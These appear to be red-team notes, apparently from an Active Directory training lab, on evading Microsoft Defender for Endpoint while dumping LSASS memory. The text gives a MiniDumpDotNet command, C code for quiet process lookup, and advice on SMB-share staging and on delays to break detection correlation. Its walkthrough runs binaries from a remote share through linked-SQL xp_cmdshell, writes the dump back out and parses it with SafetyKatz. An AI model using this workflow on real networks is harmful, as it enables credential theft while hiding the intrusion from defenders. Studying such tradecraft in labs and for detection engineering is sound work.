MDE

Endpoint Detection and Response (EDR) systems are designed to protect individual machines by continuously monitoring for malicious behavior and correlating events to detect attacker techniques, tactics, and procedures (TTPs). These systems go beyond traditional antivirus by analyzing behaviors over time, even when no single action is flagged as malicious. Microsoft Defender for Endpoint (MDE), Microsoft’s native EDR, collects telemetry from the operating system and evaluates it using cloud-based analytics to identify suspicious patterns across endpoints.

LSASS Dump

Direct interaction with the LSASS process—particularly for credential extraction—is highly monitored by MDE. While many tools attempt to dump LSASS memory by opening a process handle and invoking MiniDumpWriteDump from dbghelp.dll, this standard behavior is easily detected. A more OPSEC-conscious approach involves creating a dump covertly and exfiltrating it for offline analysis.

MiniDumpDotNet provides an alternative that bypasses standard dump APIs. It implements a custom version of MiniDumpWriteDump and supports .NET CLR injection into LSASS, allowing execution via standalone binaries, PowerShell reflection (Assembly.Load()), or even JScript/VBS loaders. It is capable of dumping various processes, including Outlook, which may contain plaintext credentials.

.\minidumpdotnet.exe <lsass-PID> <dump-output-path>

Even identifying the LSASS PID with commands like tasklist /v can trigger alerts in MDE. To reduce visibility, process enumeration can be performed using native WinAPI calls. For example, calling CreateToolhelp32Snapshot and looping through Process32Next enables resolving a process ID without relying on standard enumeration commands:

FindPID.c

int FindPID(const char* procname) {
    int pid = 0;
    PROCESSENTRY32 proc = {};
    proc.dwSize = sizeof(PROCESSENTRY32);
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    bool bProc = Process32First(snapshot, &proc);
    while (bProc) {
        if (strcmp(procname, proc.szExeFile) == 0) {
            pid = proc.th32ProcessID;
            break;
        }
        bProc = Process32Next(snapshot, &proc);
    }
    return pid;
}

Embedding this logic within a known tool like MiniDumpDotNet can lead to detection, but compiling it separately as a standalone binary typically evades both Defender AV and MDE.

File Transfers

Tool staging and execution methods also influence detection. Downloading binaries over HTTP(S) raises red flags unless masqueraded under legitimate binaries such as msedge.exe. A cleaner method is to host tools on an SMB share with Everyone granted read/write access, enabling direct execution without local persistence.

Detection Chains

EDRs such as MDE correlate actions within tight timeframes. Chaining multiple suspicious operations can trigger detections, even if each action alone appears benign. Introducing delays between commands (e.g., 10 minutes) or interleaving benign activity (like harmless SQL queries) helps break detection logic.

Lateral Movement

When moving laterally, MDE heavily monitors built-in methods like PsExec, WMI, and PowerShell Remoting through ASR (Attack Surface Reduction) rules. These Lua-based detection scripts can be extracted and analyzed directly from target systems. Alternatives such as winrs offer reduced visibility in MDE but may still be flagged by Microsoft Defender for Identity (MDI).

Example

A full LSASS dumping workflow over a linked SQL Server can be performed covertly using MSSQL’s xp_cmdshell. Begin by enabling guest access if needed:

# Enable guest access
net user guest /active:yes

Next, create a network share (e.g., studentshare337) with Read/Write permissions to Everyone and copy over binaries. Dumping begins by resolving the LSASS PID via a custom utility over the SQL link:

# Execute the binary on the target
>Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''\\DCORP-STD337.dollarcorp.moneycorp.local\studentshare337\FindLSASSPID.exe''' -QueryTarget eu-sql23

Instance    : EU-SQL23
CustomQuery : {[+] LSASS PID: 708, }

To break correlation, follow with a benign command:

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'SELECT @@version' -QueryTarget eu-sql23

Then perform the LSASS dump, writing the output directly to the share:

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''\\host\share\minidumpdotnet.exe 708 \\host\share\lsass.dmp''' -QueryTarget eu-sql23

After exfiltration, the dump can be parsed offline using SafetyKatz:

.\SafetyKatz.exe "sekurlsa::minidump c:\path\to\lsass.dmp" "sekurlsa::evasive-keys" "exit"

This approach minimizes footprint, avoids standard telemetry triggers, and maintains operational control in environments actively defended by MDE and MDI.